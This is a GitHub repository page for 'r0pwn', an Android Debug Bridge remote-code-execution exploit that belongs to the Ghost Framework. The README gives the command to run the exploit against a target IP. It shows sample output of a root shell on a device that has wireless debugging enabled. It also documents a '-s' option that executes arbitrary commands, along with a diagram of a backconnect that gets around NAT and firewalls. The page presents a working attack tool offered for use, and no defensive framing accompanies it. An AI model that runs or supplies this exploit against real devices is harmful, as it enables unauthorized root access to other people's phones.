Skip to content

R3dFruitRollUp/r0pwn

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 

Repository files navigation

r0pwn 2.0 (Ghost Framework)

r0pwn

hmm... r0pwn means robot pwn?

Android Debug Bridge RCE exploit.

Table of contents

Release

This is a repo of an exploit, but this exploit is a part of the Ghost Framework developed by @entynetproject.

Ghost Framework

Dependencies

  • android-platform-tools

Exploiting

python3 exploit.py <target>

NOTE: Target should have wireless debugging turned on

root@kali:~/r0pwn# python3 exploit.py 192.168.1.75

======================
r0pwn by Ivan Nikolsky
======================

Android Debug Bridge RCE exploit.

exploiting 192.168.1.75...
root@nevada:~# whoami
root
root@nevada:~#

Substitution

root@kali:~/r0pwn# python3 exploit.py <target> -s <code>

NOTE: Angry substitution will not work without SUID/root!

root@kali:~/r0pwn# python3 exploit.py 192.168.1.75 -s whoami

======================
r0pwn by Ivan Nikolsky
======================

Android Debug Bridge RCE exploit.

exploiting 192.168.1.75...
substituting whoami...
executing whoami...
root

Algorithm

                    backconnect (over ADB)
               +------------------------------+
               |                              |
attacker --- r0pwn --- NAT -+- Firewall -+- target
                            |            |
                            +------------+
                                bypass

Credits

Authors:

  • Ivan Nikolsky (@enty8080) - research and development.

Special Thanks:

About

Android Debug Bridge RCE exploit.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%